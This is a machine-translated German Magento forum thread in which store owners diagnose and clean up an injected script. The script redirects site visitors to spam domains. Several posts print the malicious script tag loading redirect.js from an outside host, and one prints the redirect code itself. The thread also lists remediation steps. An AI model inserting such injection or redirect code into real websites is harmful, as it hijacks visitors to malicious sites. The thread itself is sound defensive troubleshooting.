Die Website leitet zu einer anderen URL weiter

9

Maybe it's infected by some virus.

Meine Website leitet zu dieser infizierten URL weiter.

http://mon.setsu.xyz
und einige Zeit https://tiphainemollard.us/index/?1371499155545
Infizierte Links

was ich getan habe, um zu lösen.

  1. Kommentierte .htaccess-Datei (nichts passiert)
  2. Kommentierter Include-Ordner (nichts passiert)
  3. Gescannter vollständiger Server (nichts passiert, keine Viren-Malware gefunden)
  4. Der CSS-, Medien- und JS-Pfad aus der Datenbank wurde geändert, um sicherzustellen, dass das Wetter in PHP oder einem anderen JS funktioniert (nichts passiert).
  5. select * from core_config_data where path like '%secure%';Alle Links sind in Ordnung UPDATE

Ich habe gegoogelt und viele Artikel wurden darüber geschrieben, aber sie deuten darauf hin, dass es sich um ein Browserproblem handelt oder mein System infiziert ist. Ein Artikel dazu, auch wenn ich die Site auf meinem Telefon oder meinem persönlichen Laptop öffne, sind die Probleme gleich.

UPDATE 2

Ich habe die betroffene Zeile in der Datenbank gefunden. (wie auch Boris K. sagt)

In der core_config_data Tabelle haben design/head/includes Wert a

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

Welche wird beim Laden der Seite in den Kopfbereich eingefügt.

Wenn Sie die oben genannte URL besuchen, erhalten Sie ein Umleitungsskript

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Die Client-Website funktioniert ab dem Nachmittag, nachdem ich das Skript entfernt habe. But the main problem is how that script inserted into the database.

Ein Patch ist ebenfalls veraltet, daher habe ich diesen Patch ebenfalls aktualisiert.

UPDATE 3 Die Site ist erneut infiziert. Dies ist das Skript, das im Admin-Bereich eingefügt wurde ( Admin-> Konfiguration-> Allgemein-> Design-> HTML-Kopf-> Verschiedenes Skript ). Administrator

Und in der Datenbankspalte Datenbank

Ich weiß jetzt nicht, was ich tun soll. Da ich jedes Passwort geändert habe, wurden alle alten Benutzer gelöscht.

UPDATE 3

Bis jetzt tritt dieser Fehler nicht auf. Wenn Sie also die oben genannten Schritte ausführen, können Sie dieses Problem beheben.

UPDATE :: 4 Installieren Sie immer Patches, da dies mir in Projekten hilft, das Geschäft weniger anfällig für diese Art von Problemen zu machen, und Patches sind ebenfalls wichtig. Man kann https://magescan.com/ verwenden , um die Probleme auf ihrer Website zu überprüfen.

inrsaurabh
quelle
in Ihrem System kann betroffen sein, überprüfen Sie es bitte. Überprüfen Sie Ihren Browser.
Rama Chandran M
@RamaChandran Wenn ich über diese URL google, schlägt fast jeder vor, dass es sich um ein Browserproblem handelt. Ich habe die Seite in meinem Handy auch gleich geöffnet.
Inrsaurabh
Bitte geben Sie Ihre Website-URL an
Rama Chandran M
1
Ich habe <script src = "<a href = " melissatgmt.us/redirect_base/redirect.js " > https : //… >" id = "1371499155545"> </ script> aus design / head / includes gelöscht. Es hat immer noch nicht funktioniert. Und nachdem ich meine Website besucht habe, wird dieser Javascrip-Code wieder angezeigt. Hast du irgendwelche gedanken Website-Adresse ist hdvideodepot.com
Mark
1
Können Sie bitte ein Magento-Versions-Tag hinzufügen?
SV3N

Antworten:

6

Ich habe den injizierten Code in der core_config_dataTabelle unter gefunden design/head/includes. Entfernte es und jetzt ist die Seite wieder normal.

UPDATE: Wie alle anderen erwähnt haben, ist es heute Morgen wieder passiert. Dieses Mal habe ich es leichter aus dem Admin-Bereich unter entfernt System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Dies ist eine große Sicherheitslücke. Ich hoffe, Magento arbeitet an einem Patch.

UPDATE 2: Das Skript kam wieder zurück, also habe ich das Datenbankkennwort geändert und den Cache geleert. Ungefähr eine Stunde später ist das Skript zurück. Ich glaube also nicht, dass es durch die Datenbank hinzugefügt wird. Ich habe gerade mein Administratorkennwort geändert. Mal sehen, ob es wieder zurückkommt.

UPDATE 3: Da ich gestern das Administratorkennwort auf beiden betroffenen Websites geändert habe, sind beide nach etwa 24 Stunden noch sauber.

Boris K.
quelle
2
Wow, das ist eine riesige Sicherheitsverletzung. Irgendeine Idee, welche Art von Sicherheitslücke sie verursacht hat?
Yehia A. Salam
3
Muss ein Loch in älteren Versionen von Magento sein. Ich habe eine auf Magento 2.1 erstellte Site, die nicht betroffen war, aber jede Site unter Version 2 wird umgeleitet.
Boris K.
Dies ist ein großes Sicherheitsproblem. Weiß jemand, wie der Code in die Tabelle eingefügt wurde? In dieser Tabelle können wir im Admin-Bereich der Fußzeile / Kopfzeile der Website Stile und Javascript hinzufügen. Wie könnte ein Hacker das kompromittieren? Bedeutet das, dass sie Zugriff auf den Administrator hatten?
Erdnüsse
es kommt immer wieder zurück, nachdem es gelöscht wurde, nicht sicher, was zu tun ist
Yehia A. Salam
Ich habe unter System> Berechtigungen> Benutzer böswillige Benutzer erkannt. Nachdem Sie sie entfernt haben (und zuvor die Tabelle core_config_data repariert und das Kennwort des Administrators geändert haben), scheint sie stabil zu sein, aber ich würde gerne wissen, wie das überhaupt passiert ist. Das Loch / die Hintertür ist möglicherweise noch vorhanden und es ist ein Rätsel.
Erdnüsse
3

Gleiches Problem auf einer anderen Magento-Site. Ich habe festgestellt, dass im HEAD-Bereich der Seite ein Skript eingefügt wird, das redirect_base / redirect.js von melissatgmt.us anfordert (dann in eine andere Domain geändert), kann aber nicht herausfinden, wie diese Scheiße eingefügt wird.

UPDATE : Wie von anderen erwähnt, wurde der Eintrag in der Tabelle core_config_data gefunden und entfernt, aber der Datensatz war beim erneuten Laden der nächsten Seite wieder verfügbar. Ich habe das Datenbankkennwort geändert und jetzt scheint es besiegt zu sein. Ich bin nicht sicher, ob die Passwortänderung die ultimative Lösung ist, aber es ist trotzdem eine Sicherheitsverbesserung.

UPDATE 2 : Wie von Jix Sas angegeben, ist der Zugriff über die Konfiguration in der Magento-Administration eine einfachere Lösung als der direkte Zugriff auf die Datenbanktabelle. Aber die Scheiße kommt alle 10/15 Minuten zurück.

UPDATE 3 : Das Administratorkennwort wurde geändert, einige CMS-Seiten (Kundenservice und über uns) überprüft und gespeichert, die irgendwie infiziert zu sein schienen, der Cache wurde deaktiviert, der Cache wurde mehrmals gereinigt (nach jedem Überprüfen und Speichern der "infizierten" CMS-Seite) In den letzten 8 Stunden wurde mehr Skript injiziert.

ConsuLanza Informatica
quelle
Ja, du hast Recht, ich habe die Zeile, die betroffen ist.
Inrsaurabh
Beachten Sie, dass der Magento-Administrator problemlos erreichbar ist und ich im Weblog sehen kann, dass Bot-Zugriffe nicht betroffen sind. Ich denke, die Malware ist auf das Frontend beschränkt und überprüft den Benutzeragenten des Browsers.
ConsuLanza Informatica
Wussten Sie also, woher es injiziert wurde?
Yehia A. Salam
Ja, ich kann bestätigen, dass es alle 10/15 Minuten immer wieder zurückkommt, auch nachdem der Eintrag aus der Datenbank
gelöscht wurde
2

Ich habe den Pfad zum Admin-Panel geändert app/etc/local.xmlund es hilft. Das Skript wird nicht mehr hinzugefügt design/head/includes.

Erklärung:

In der zuvor app/etc/local.xmlgeänderten <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Form war es sitedomain.com/admin, und jetzt wird der Pfad zum Admin-Panel sein sitedomain.com/new_admin_path

Eugenia
quelle
Tut mir leid, dass ich dich nicht verstanden habe, was du getan hast, which path u chagned
bitte
In der App / etc / local.xml habe ich geändert. <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>Früher war es sitedomain.com/admin, und jetzt ist der Pfad zum Admin-Bereich sitedomain.com/new_admin_path
Eugenia
Ok, ich habe es verstanden, was
du
1

Dies ist eine so große Erleichterung, dass ich meine Seite seit dem Morgen 10 Mal wiederhergestellt habe.

Der Bug kommt immer wieder.

Was ist die ultimative Lösung?

DB-Passwort ändern? Root-Passwort ändern? Wird ein Patch veröffentlicht?

Ich bin nicht sicher, ob dies damit zusammenhängt. Ich habe unten eine E-Mail von einer Sicherheitsberatung erhalten

Sehr geehrte Damen und Herren,

Wir sind Hatimeria, ein Magento-Entwicklungsunternehmen mit Sitz in der Schweiz, in Polen und in den Niederlanden.

Vor kurzem haben wir begonnen, mit einem neuen Client zu arbeiten, und seinen alten Server übernommen. Im Moment, als wir auf den Server zugegriffen haben, sind wir auf Malware gestoßen, mit der Hacker den Server des Clients übernehmen und ihn als „Hacker-Maschine“ zum Hacken anderer Websites verwenden konnten. Natürlich wusste der Client nicht, dass dies auf seinem Server geschah.

Wir haben Datenbankanmeldeinformationen Ihrer Website gefunden, die über diesen Server gehackt wurden. Natürlich werden wir nichts damit anfangen, aber ich fühle mich verpflichtet, Sie zu kontaktieren und Ihnen mitzuteilen, was los ist. Der Hack wurde über die Magento Cacheleak-Sicherheitsanfälligkeit durchgeführt, die möglicherweise noch in Ihrem Geschäft vorhanden ist.

Ich empfehle Ihnen, diese Sicherheitsanfälligkeit sofort zu beheben und Ihr Datenbankkennwort zu ändern. Unsere Techniker sagen, dass dies ungefähr 30 Minuten dauern sollte.

Auf der Website MageReport können Sie sehen, wofür Ihre Website sonst noch anfällig sein könnte: https://www.magereport.com/scan/?s=

Meine Hauptabsicht dieser E-Mail ist nicht die Kundenakquise. Wenn Sie jedoch Hilfe bei der Sicherung Ihres Geschäfts benötigen oder andere Fragen haben, helfen wir Ihnen gerne weiter.

Mit freundlichen Grüßen Thomas Tanner

Ich denke, die Lösung ist DB-Passwort ändern

Mohit Khatri
quelle
1

Wir müssen verstehen, was die Hauptursache für solche Spam-Injektionen ist

Wenn Ihre Site injiziert wurde, überprüfen Sie Ihre Site bei ALLEN DREI Malware-Scans

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Ich habe das Gefühl, dass dies auf einen fehlenden Sicherheitspatch zurückzuführen ist! Wenn ein Patch fehlt, MELDEN SIE ES UNTER DIESEM THEMA .

  1. Ändern des Hosting-Zugriffskennworts Ändern des Datenbankkennworts Ändern der Administrator- Anmeldekennwörter HINDEN SIE ADMIN- UND DOWNLOAD-URLs AUS und verbergen Sie / RSS / aus der öffentlichen Ansicht.

  2. Führen Sie einen vollständigen Site-Virenscan durch. Ihr Hosting-Anbieter kann die Site scannen, wenn Sie dies nicht selbst tun können.

  3. Gehen Sie zu System -> Benutzer und prüfen Sie, ob nicht autorisierte registrierte Benutzer auf dem Konto sind.

Symbol
quelle
0

Ich habe das Problem behoben. Auch nachdem ich diese Datei <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>aus der core_config_dataWertetabelle gelöscht habe design/head/includes. Das Problem wurde nicht behoben. Der Skriptcode wurde immer wieder eingefügt. Befolgen Sie einfach diese drei Schritte, um das Problem zu beheben.

  1. Löschen Sie den Skriptcode aus der core_config_dataTabelle in design/head/includes.
  2. Ändern Sie das Datenbankkennwort einschließlich der app/etc/local.xmlAnmeldeinformationen.
  3. Löschen Sie den Cache im Magento-Stammordner mit diesem Befehl rm -rf var/cache/*

ps Ich habe den ganzen Tag verbracht. Hoffentlich funktioniert das für Sie. Und stellen Sie sicher, dass Sie die Datei ständig sichern.

Kennzeichen
quelle
0

Genau das ist mir gerade heute passiert! Weiterleitung auf dieselbe Website. Ich fand das Skript jedoch im Magento-Administrationsbereich unter Konfiguration> Design> HTML-Kopf> Verschiedene Skripte. Es gab dieses Skript: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> Ich habe es von dort entfernt und die Website funktioniert einwandfrei. Ich habe nicht den Ordner, in dem Sie das Skript gefunden haben. Haben Sie eine Idee, wo es sich befinden könnte? (Wie Sie den Pfad zu HTML-Kopf> verschiedene Skripte kennen)

Was hast du in letzter Zeit gemacht? Vielleicht können wir die Ursache herausfinden? Für mich habe ich ein kostenloses Newsletter-Popup installiert, das die Ursache sein kann. Was ist mit dir?

UPDATE: Nun ist das Skript zurück. Jemand sagt mir, wie kann ich auf dieses Skript aus der Datenbank zugreifen, um es bitte zu entfernen?

UPDATE 2: Wie von Mark angegeben, wurde dieses Skript durch Entfernen des Skripts UND Ändern des Datenbankkennworts nicht mehr angezeigt. Wenn jemand den Namen dieser Sicherheitsanfälligkeit kennt oder eine Gefahr für die Zahlung der Kunden besteht, teilen Sie uns dies bitte mit.

جيلبير
quelle